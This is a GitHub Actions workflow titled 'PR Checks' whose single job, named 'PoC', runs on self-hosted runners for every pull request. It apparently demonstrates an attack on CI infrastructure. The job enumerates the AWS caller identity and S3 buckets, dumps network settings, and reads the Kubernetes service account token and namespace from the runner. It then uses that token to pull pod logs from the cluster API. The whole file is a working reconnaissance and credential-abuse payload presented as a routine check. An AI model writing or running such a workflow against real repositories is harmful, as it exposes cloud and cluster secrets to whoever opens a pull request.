name: PR Checks

on: pull_request

jobs:
  poc:
    name: PoC
    runs-on: [self-hosted]
    steps:
      - run: |
          echo "*** test whoami ***"
          aws sts get-caller-identity
          echo "*** S3 ***"
          aws s3 ls
          echo "*** test net ***"
          ifconfig
          echo "*** test k8s api ***"
          APISERVER=https://kubernetes.default.svc
          SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
          NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
          TOKEN=$(cat ${SERVICEACCOUNT}/token)
          CACERT=${SERVICEACCOUNT}/ca.crt
          curl --cacert ${CACERT} --header "Authorization: Bearer ${TOKEN}" -X GET ${APISERVER}/api/v1/namespaces/default/pods/ingress-nginx-ingress-controller-6cbf95f5d4-d628h/log
         
